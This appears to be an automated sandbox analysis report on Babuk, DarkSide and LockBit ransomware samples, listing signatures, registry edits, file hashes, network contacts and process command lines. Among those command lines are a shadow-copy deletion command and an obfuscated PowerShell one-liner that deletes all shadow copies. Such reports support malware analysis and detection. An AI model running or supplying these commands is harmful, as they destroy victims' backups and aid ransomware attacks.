memory/2380-241-0x0000000001350000-0x0000000001367000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6c03245d5980669fa8dcb0bb5136d217 |
| SHA1 | c675715811352edf59bcb7c9204f0640d8330e81 |
| SHA256 | d9dbb21c063fc20d970eee5ede2df22b3544ab8e1fb49946639d0db814016feb |
| SHA512 | 964fe4f7d273d549d51279024839b0e617211c9db0049231bb92119357d0bee83b50a8b09424b886fe515e7b53f08cddb57672261d2aa9649d36f6a388a0e23b |
memory/2380-280-0x0000000001350000-0x0000000001367000-memory.dmp
Analysis: behavioral7
Detonation Overview
| Submitted | 2024-07-07 14:07 |
| Reported | 2024-07-07 14:38 |
| Platform | win7-20240508-en |
| Max time kernel | 1561s |
| Max time network | 1563s |
Command Line
Signatures
Babuk Locker
Deletes shadow copies
Renames multiple (227) files with added filename extension
Enumerates connected drives
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe" |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet |
| C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet |
| C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet |
| C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet |
Network
Files
C:\PerfLogs\Admin\How To Restore Your Files.txt
| MD5 | 81fc4c91a0938482f65a72216cda1e39 |
| SHA1 | 3fb3d27ceb1502ddf0d68fa9251a6aec46036377 |
| SHA256 | 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591 |
| SHA512 | ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4 |
Analysis: behavioral18
Detonation Overview
| Submitted | 2024-07-07 14:07 |
| Reported | 2024-07-07 14:38 |
| Platform | win10v2004-20240704-en |
| Max time kernel | 1714s |
| Max time network | 1156s |
Command Line
Signatures
DarkSide
Renames multiple (162) files with added filename extension
Reads user/profile data of web browsers
UPX packed file
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\bf9fb421.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\bf9fb421.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bf9fb421 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bf9fb421\ = "bf9fb421" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\bf9fb421.ico" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2780 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2780 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s" |
| C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 13.248.169.48:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | 48.169.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | temisleyes.com | udp |
| HK | 154.219.131.251:443 | temisleyes.com | tcp |
| US | 13.248.169.48:443 | catsdegree.com | tcp |
| HK | 154.219.131.251:443 | temisleyes.com | tcp |
Files
memory/2780-0-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2780-8-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2324-10-0x00007FFC1B7D3000-0x00007FFC1B7D5000-memory.dmp
memory/2324-16-0x0000028144290000-0x00000281442B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgyqzljn.k4d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2324-21-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp
memory/2324-22-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp
memory/2780-23-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2324-24-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp
memory/2324-27-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d34112a7b4df3c9e30ace966437c5e40 |
| SHA1 | ec07125ad2db8415cf2602d1a796dc3dfc8a54d6 |
| SHA256 | cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf |
| SHA512 | 49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053 |
C:\Users\Admin\README.bf9fb421.TXT
| MD5 | f418a249405444da33cc73b402a26306 |
| SHA1 | 1a6c493e74036f93f0dae4b65e6c543c213ce418 |
| SHA256 | b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09 |
| SHA512 | b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf |
memory/2780-222-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2780-227-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2780-229-0x00000000002C0000-0x00000000002D7000-memory.dmp
Analysis: behavioral21
Detonation Overview
| Submitted | 2024-07-07 14:07 |
| Reported | 2024-07-07 14:38 |
| Platform | win7-20240705-en |
| Max time kernel | 1559s |
| Max time network | 1568s |
Command Line
Signatures
DarkSide
Renames multiple (150) files with added filename extension
Reads user/profile data of web browsers
UPX packed file
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2384 wrote to memory of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2384 wrote to memory of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2384 wrote to memory of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2384 wrote to memory of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
memory/2384-0-0x0000000000E60000-0x0000000000E70000-memory.dmp
memory/2316-5-0x000007FEF594E000-0x000007FEF594F000-memory.dmp
memory/2316-6-0x000000001B5A0000-0x000000001B882000-memory.dmp
memory/2316-7-0x0000000002080000-0x0000000002088000-memory.dmp
memory/2316-8-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
memory/2316-9-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
memory/2316-10-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
memory/2316-11-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
memory/2384-12-0x0000000000E60000-0x0000000000E70000-memory.dmp
memory/2316-13-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
C:\Users\README.a2dbc85c.TXT
| MD5 | 25d0b19a0ec34a39dfa3e177866f01a3 |
| SHA1 | a3704d1f6499738ccd694bdd6008a850c6b2e453 |
| SHA256 | f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8 |
| SHA512 | ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | db5976b09a5ea23bdc1f450ffbbec067 |
| SHA1 | 452cc01c049df3866f8edc2f8fe7f9d21dd93bd1 |
| SHA256 | 8f4986961c5abcac37cdc4ed1cdb5ded9b2f37cf3ff0bf8c5b8c5f2a162ca50f |
| SHA512 | 7a62f04742b572a40d2e162f18b8a759af26763a7e9cf78d700423a0f9289bafca4c459d3d93c157eea0eb281f03968c5ad7c566589c4f4d2e9d422094e35f97 |
memory/2384-209-0x0000000000E60000-0x0000000000E70000-memory.dmp
memory/2384-218-0x0000000000E60000-0x0000000000E70000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:13
Platform
win10v2004-20240704-en
Max time kernel
1661s
Max time network
1171s
Command Line
Signatures
Lockbit
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (6418) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\118C.tmp.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\Lang\et.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\ecc.md | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_CatEye.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-400_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-16_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-60_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\meta-index | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-64_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019VL_KMS_Client_AE-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\modules\common.luac | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerSmallTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.1d9d722e.pri | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-72_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\telemetryrules\hxoutlook.exe_Rules.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\es-ES\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\Microsoft.Advertising\vpaid.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker32.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Templates\1033\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\82.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\processing.slk | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_start_a_coversation_v3.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected-hover.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7FR.dub | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeLargeTile.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
